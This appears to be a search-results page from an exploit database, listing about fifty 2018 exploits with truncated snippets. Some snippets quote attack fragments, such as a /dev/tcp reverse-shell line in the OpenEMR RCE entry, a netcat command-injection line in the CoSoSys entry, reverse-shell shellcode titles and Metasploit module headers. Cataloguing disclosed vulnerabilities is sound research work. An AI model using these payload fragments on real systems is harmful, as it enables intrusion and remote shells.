39001 matches found
Mikrotik WinBox 6.42 - Credential Disclosure Exploit
Exploit for windows platform in category remote exploits Exploit Title: Mikrotik WinBox 6.42 - Credential Disclosure Metasploit Date: 2018-05-21 Exploit Authors: Omid Shojaei @Dmitriyarea51, Dark VoidSeeker, Alireza Mosajjal Vendor Page: https://www.mikrotik.com/ Sotware Link:...
iSmartViewPro 1.5 - Device Alias Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow Author: Rodrigo Eduardo Rodriguez Vendor Homepage: https://securimport.com/ Software Link:...
iSmartViewPro 1.5 - Account Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: iSmartViewPro 1.5 - 'Account' Buffer Overflow Discovery by: Alan Joaquín Baeza Meza Vendor Homepage: http://www.securimport.com/n/en/ Software Link:...
Microsoft Windows SCF File Feature Bypass Vulnerability
Microsoft Windows suffers from an SCF open file security warning feature bypass vulnerability. Exploit Title: Microsoft Windows 'SCF' File 'Open File Security Warning' Feature Bypass Vulnerability Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link:...
Open-AudIT Community 2.2.6 - Cross-Site Scripting Vulnerability
Exploit for windows platform in category web applications Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting Exploit Author: Ranjeet Jaiswal Vendor Homepage: https://opmantek.com/ Software Link:https://opmantek.com/network-tools-download/open-audit/ Affected Version: 2.2.6 Category:...
QNap QVR Client 5.0.3.23100 - Denial of Service Exploit
Exploit for windows platform in category dos / poc Exploit Title : QNap QVR Client 5.0.3.23100 - Denial of Service PoC Discovery by : Rodrigo Eduardo Rodriguez Vendor Homepage: http://www.qnapsecurity.com/n/en/ Software Link : http://download.qnap.com/Surveillance/Utility/QNewMon5.zip Tested...
OpenEMR < 5.0.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...
OCS Inventory NG Webconsole Shell Upload Vulnerability
OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted. Title Unrestricted File Upload RCE in OCS Inventory NG Webconsole before 2.5 Reserved CVE...
Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection Vulnerability
Exploit for jsp platform in category web applications Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection Reserved CVE: CVE-2018-13415 Vulnerability Overview The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity...
PHP Template Store Script 3.0.6 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name Site Titel : Exclusive Scripts Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/ Category: Web...
LAMS < 3.1 - Cross-Site Scripting Vulnerability
Exploit for java platform in category web applications Exploit Title: LAMS 3.1 - Cross-Site Scripting Exploit Author: Nikola Kojic Website: https://ras-it.rs/ Vendor Homepage: https://www.lamsfoundation.org/ Software Link: https://www.lamsfoundation.org/downloadshome.htm Category: Web Application...
PokerStars - Insecure Library Loading Code Execution Exploit
PokerStars is an online poker company based in Ta 'Xbiex, Malta. PokerStars holds licenses in all countries where online gaming is regulated: France, Belgium, Italy, Spain, Denmark, Estonia, Germany. In countries where there is no regulation on online poker PokerStars.com is the most popular onli...
CMS ISWEB 3.5.3 - Directory Traversal Vulnerability
Exploit for php platform in category web applications Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal Exploit Author: Thiago "thxsena" Sena Vendor Homepage: http://www.isweb.it Version: 3.5.3 Tested on: Linux CVE : N/A PoC: CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file...
Wedding Slideshow Studio 1.36 - Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: Socumsoft Wedding Slideshow Studio 1.36 Date: 02.08.2018 Exploit Author: Achilles Vendor Homepage: http://www.socusoft.com Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe Tested on OS: Windows 7...
cgit < 1.2.1 - cgit_clone_objects() Directory Traversal Vulnerability
Exploit for cgi platform in category web applications There is a directory traversal vulnerability in cgitcloneobjects, reachable when the configuration flag enable-http-clone is set to 1 default: void cgitcloneobjectsvoid if !ctx.qry.path cgitprinterrorpage400, "Bad request", "Bad request";...
Subrion CMS 4.2.1 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Subrion CMS- 4.2.1 XSS Using component with known Vulnerability Exploit Author: Zeel Chavda Vendor Homepage: https://subrion.org/ Software Link: https://subrion.org/download/ Version: 4.2.1 REQUIRED Tested on: Windows,FireFox CV...
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: Cross-Site Request Forgery Add Admin Google Dork: Powered by onArcade v2.4.2 Author: r3m0t3nu11Zero-way Software Link: "http://www.onarcade.com" Version: "Uptodate" the appilication is vulnerable to CSRF attack No CSRF token in...
Monstra 3.0.4 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title:Monstra-Dev 3.0.4 Stored Cross Site Scripting Exploit Author: Nainsi Gupta Vendor Homepage: http://monstra.org/ Software Link: https://github.com/monstra-cms/monstra Published In-...
Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation Exploit
Exploit for windows platform in category local exploits include "stdafx.h" include include include include pragma comment lib,"psapi" PULONGLONG leakbuffer = PULONGLONGVirtualAllocLPVOID0x000000001a000000, 0x2000, MEMRESERVE | MEMCOMMIT, PAGEREADWRITE; ULONGLONG leakQWORDULONGLONG addr, HANDLE...
Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Vulnerability
Exploit for jsp platform in category web applications Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Reserved CVE: CVE-2018-13417 Vulnerability Overview The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External...
Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 (86 bytes)
Title: Linux/x86 - Reverse TCP shell IPv6 + Null Free Shellcode Author: Kartik Durg Shellcode Length: 86 BYTES Student-ID: SLAE-1233 Note https://iamroot.blog/2018/07/29/0x2-shellreversetcpipv6-linux-x86/ Description: Connect-back to IPV6 socket listening on IP ::FFFF:192.168.1.5 and port 4444. /...
ASUS DSL-N12E C1 1.1.2.3_345 - Remote Command Execution Exploit
Exploit for hardware platform in category web applications Exploit Title: ASUS DSL-N12EC1 1.1.2.3345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/...
AgataSoft Auto PingMaster 1.5 - Host name Denial of Service PoC Exploit
Exploit for windows platform in category local exploits Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: http://agatasoft.com/ Software Link : http://agatasoft.com/PingMaster.exe Tested Version: 1.5 Vulnerability Type:...
Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload UFO. This exploit targets only systems using Ubuntu Trusty / Xenial kernels 4.4.0-21 'Linux Kernel UDP Fragmentation Offset UFO Privilege Escalation', 'Description' = %q This module...
Basic B2B Script 2.0.0 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields. Site Titel : B2B Script Vendor Homepage: https://www.phpscriptsmall.com/ Vendor Software :...
Seq 4.2.476 - Authentication Bypass Vulnerability
Exploit for windows platform in category web applications Exploit Title: Seq 4.2.476 - Authentication Bypass Exploit Author: Daniel Chactoura Vendor Homepage: https://getseq.net/ Software Link: https://getseq.net/Download/All Version: = 4.2.476 CVE : CVE-2018-8096 Post Reference:...
Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS Site Titel : Find your needs on Domain Name Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
WebRTC - H264 NAL Packet Processing Type Confusion Exploit
Exploit for multiple platform in category dos / poc Type confusion can occur when processing a H264 packet. In the method PacketBuffer::FindFrames in modules/videocoding/packetbuffer.cc there is a loop on line 296 that goes through the databuffer vector backwards. The flag ish264 is set before th...
Sun Solaris 11.3 AVS - Local Kernel root Exploit
Exploit for solaris platform in category local exploits / Exploit Title: Solaris/OpenSolaris AVS kernel code execution Google Dork: if applicable Date: 24/7/2018 Exploit Author: mu-b Vendor Homepage: oracle.com Software Link: Version: Solaris 10, Solaris Sun Opensolaris include include include...
PageResponse FB Inboxer Add-on 1.2 - search_field SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: FB Inboxer 1.2 - 'searchfield' SQL Injection Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage:...
Imperva SecureSphere 12.0.0.50 - SealMode Shell Escape Exploit
Exploit for linux platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SecureSphere v12.0.0.50 - SealMode Shell Escape root", 'Description' = %q This module...
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Vulnerability
Exploit for jsp platform in category web applications Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processi...
WebRTC - VP8 Block Decoding Use-After-Free Exploit
Exploit for multiple platform in category dos / poc There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block is then treated a pointer, leading to a crash in WebRTC. ==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc...
WebRTC - FEC Processing Overflow Exploit
Exploit for multiple platform in category dos / poc There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incomingrtppacket, which is an RTP packet with a mac length that is defined by the...
Easy DVD Creator 2.5.11 Buffer Overflow Exploit
Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' SEH Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel :...
CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Exploit
Exploit for php platform in category web applications Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection Author : 0x09AL Tested on : Endpoint Protector 4.5.0.1 Software Link : https://www.endpointprotector.com/ Vulnerable Versions : Endpoint Protector &1|nc %s %s...
DataLife Engine 13.0 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications + Title: DataLife Engine Core Cross Site Scripting XSS & Execution Code + Author: Mostafa Gharzi + Team: Maher - CertCC.ir + Vendor Homepage: www.dleviet.com www.dle-news.com + Tested on: Windows 10 & Kali Linux + Versions: 13.0 and Before +...
My Video Converter 1.5.24 Buffer Overflow Exploit
Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title : My Video Converter 1.5.24 - Remote Buffer Overflow Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel : www.youtube.com/c/Pentestingwithspirit...
Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite Exploit
Exploit for windows platform in category dos / poc !/usr/bin/env python Exploit Title : Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC Vulnerability Type: SEH Overwrite POC Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel :...
Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation Exploit
Exploit for linux platform in category local exploits Title: Imperva SecureSphere = v13 - Privilege Escalation Author: 0x09AL Tested on: Imperva SecureSphere 11.5,12.0,13.0 Vendor: https://www.imperva.com/ Vulnerability Description There is a program named PCE.py which runs as root and starts a...
TI Online Examination System v2 - Arbitrary File Download Vulnerability
Exploit for php platform in category web applications Exploit Title: TI Online Examination System v2 - Arbitrary File Download Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 Version: 2.0 Category: Webapps Tested on:...
WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change) Vulnerability
Exploit for php platform in category web applications i...
ipPulse 1.92 - Licence Key Denial of Service PoC Exploit
Exploit for windows platform in category dos / poc Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link:...
Switch Port Mapping Tool 2.81 - SNMP Community Name Denial of Service PoC Exploit
Exploit for windows platform in category dos / poc Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: https://switchportmapper.com/ Software Link : http://download.switchportmapper.com/spm281.zip Tested Version:...
HRSale 1.0.6 Local File Disclosure Vulnerability
Exploit for php platform in category local exploits Exploit Title: HRSALE - HR Management PHP Script - LFD Exploit Author: ShanoWeb Author Mail : MrdotNet2NetatGmaildotcom Vendor Homepage: http://hrsale.com Software Buy: https://www.codester.com/items/8599/hrsale-hr-management-php-script Demo:...
Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)
/ Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode 116 Bytes Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.34-v7+ 1110 SMP Mon Apr 16 15:18:51 BST 2018 armv7l GNU/Linux pi@raspberrypi: $ lsbrelease -a No LSB modules are...
Vtiger CRM 6.3.0 Authenticated Logo Upload Remote Command Execution Exploit
Vtiger version 6.3.0 CRM's administration interface allows for the upload of a company logo. Instead of uploading an image, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This Metasploit module was tested against vTiger CRM versi...
SonicWall Global Management System XMLRPC Exploit
This Metasploit module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 Build 8110.1197 and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire netwo...
MicroFocus Secure Messaging Gateway Remote Code Execution Exploit
This Metasploit module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. One of the user supplied parameters of API endpoint is used by the application...
Microsoft Windows Kernel - win32k!NtUserConsoleControl Denial of Service PoC Exploit
Exploit for windows platform in category dos / poc Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service PoC Author: vportal Date: 2018-07-27 Vendor homepage: http://www.microsoft.com Version: Windows 7 x86 Tested on: Windows 7 x86 CVE: N/A It is possible to...